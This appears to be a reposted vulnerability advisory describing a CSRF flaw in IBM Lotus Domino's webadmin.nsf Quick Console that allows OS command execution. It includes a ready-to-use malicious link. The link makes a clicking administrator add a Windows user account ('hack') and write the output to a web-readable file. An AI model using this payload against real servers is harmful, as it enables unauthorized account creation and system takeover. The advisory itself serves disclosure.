Description
Lotus Domino is vulnerable to CSRF attack which can de used for OS command execution in webadmin.nsf database by using Quick Console.
Lotus Domino is an IBM server product that provides enterprise-grade e-mail, collaboration capabilities, and custom application platform. Domino began life as Lotus Notes Server, the server component of Lotus Development Corporation's client-server messaging technology. It can be used as an application server for Lotus Notes applications and/or as a web server. It also has a built-in database system in the format of NSF.
Details
Server is vulnerable to Cross Site Request Forgery attack.
One of the ways to execute this attack is Cross Site Command Execution.
By sending a special link to the administrator, an attacker can execute any command on the OS where Lotus is installed and get the result of the executed command.
Example:
An attacker can give the administrator the following link:
URL=http://server/webadmin.nsf/agReadConsoleData$UserL2?OpenAgent&Mode=QuickConsole&Command=load cmd /c net user hack hack123 /add > C:\Lotus\Domino\data\domino\html\download\filesets\netuser.png&1271932906681
If the administrator clicks this link, a command is executed which will add a new user to the OS.
The attacker can also check if it executes by reading the file http://server/download/filesets/netuser.png
扫一扫
118
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
